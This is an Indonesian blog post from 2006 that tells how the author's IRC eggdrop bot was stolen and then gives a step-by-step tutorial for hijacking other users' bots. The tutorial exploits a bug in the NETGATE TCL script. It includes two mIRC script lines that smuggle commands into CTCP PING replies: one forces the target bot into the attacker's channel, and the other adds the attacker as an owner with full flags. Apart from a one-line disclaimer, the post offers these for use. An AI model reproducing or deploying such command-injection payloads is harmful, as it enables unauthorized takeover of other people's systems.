Friday, January 20, 2006

Mencuri Bot Di IRC.DAL.NET

Dengan sedikit pengalaman di dunia irc.dal.net, hal ini membuat ku jadi tertarik. Begitu banyak yang di dapat, terutama dunia bajak-membajak mulai dari server, shell sampai pada bot (eggdrop). Ada Sedikit pengalaman bisa dijadikan pelajaran. Waktu itu aku bingung dengan tingkah laku dan tindak tanduk bot ku, aku menggunakan dua jenis TCL; pertama adalah tcl NETGATE keluaran anyar dari MAXFIDER, kedua adalah Kinana dari kinana crew (sebenarnya turunan TCL NETGATE).
Setelah melakukan pengecekan dan pelacakan ternyata bot ku dicuri, dan sudah ada beberapa channel di dalamnya yang aku tidak kenal.Dan yang membuat ku sempat ketar-ketir adalah sudah ada beberapa nama yang menjadi Owner bot ku yang aku tidak kenal. Dengan langkah seribu kulacak dan ku satroni channels tersebut.Tapi apa yang kudapati adalah channel yang banyak dengan bot curian juga.
Singkat Cerita aku mencari artikel dan informasi tentang itu, eh ternyata dapet dari teman di #binushacker dan #cerianet.Singkat cerita aku tau bahwa tcl NETGATE ada bug nya.
Ternyata ada cara untuk mengambil bot seseorang, aku akan beri sedikit tutorial:
1. Langkah pertama adalah, duduk dengan sikap manis dan nyalakan komputer mu.
2. Langkah kedua adalah siapkan software MIRC dan terhubunglah kedunia internet.
3. Langkah ketiga adalah, pasti dan tak boleh terlupakan siapkan rokok dan kopi di sampingmu.Hmm...
4. Minum sedikit kopi, lalu tariklah napas dan hisaplah sebatang rokok .... hmmmm setelah anda rileks marilah kita mulai.
5. Sekarang siapkan software MIRC mu itu, eit muncul window untuk register...hmm masak hari gini belom di register.
6. Setelah MIRC dibuka maka masukkan lah scripts berikut :
on 1:ctcpreply:ping*:{ ctcpreply $nick PING [set ctcp-mode 0;channel add #channelmu]} :pada Script Editor yang tersedia.
7. Nah setelah beres semua maka jangan lupa save dan keluar dari Script Editor.
8. Langsung dech hubungkan MIRC mu ke dunia maya, nah script mu siap dipakai beraksi dech.
9. Nah untuk menggunakannya tinggal kamu ping dengan fasilitas CTCP dari mirc untuk bot yang kamu incar.
10. Nah selesailah sudah bot itu akan masuk ke channelmu
11. Nah klo kamu mau ngambil jadi bot kmu gimana yach???Nah klo itu tinggal masukkin ajah dech script berikut ke script editor nya:
On 1:ctcpreply:ping*:{ctcpreply $nick PING [set ctcp-ping 0;adduser nickmu yournic!*@*;chattr nickmu "Zfhjmnovptx"]

Penulis tidak bertanggung jawab atas praktek yang dilakukan orang atas dibacanya Tutor ini, tutor ini diberikan hanya untuk memberikan pengetahuan.Hal yang terjadi atas penulisan ini tidak di tanggung pihak penulis.
Hmm Setelah kita punya bot itu enaknya di pake paan yach??Hmm apa bugnya cuman itu???.Nah tinggal anda obok-obok dech tuh NETGATE.tcl

No comments: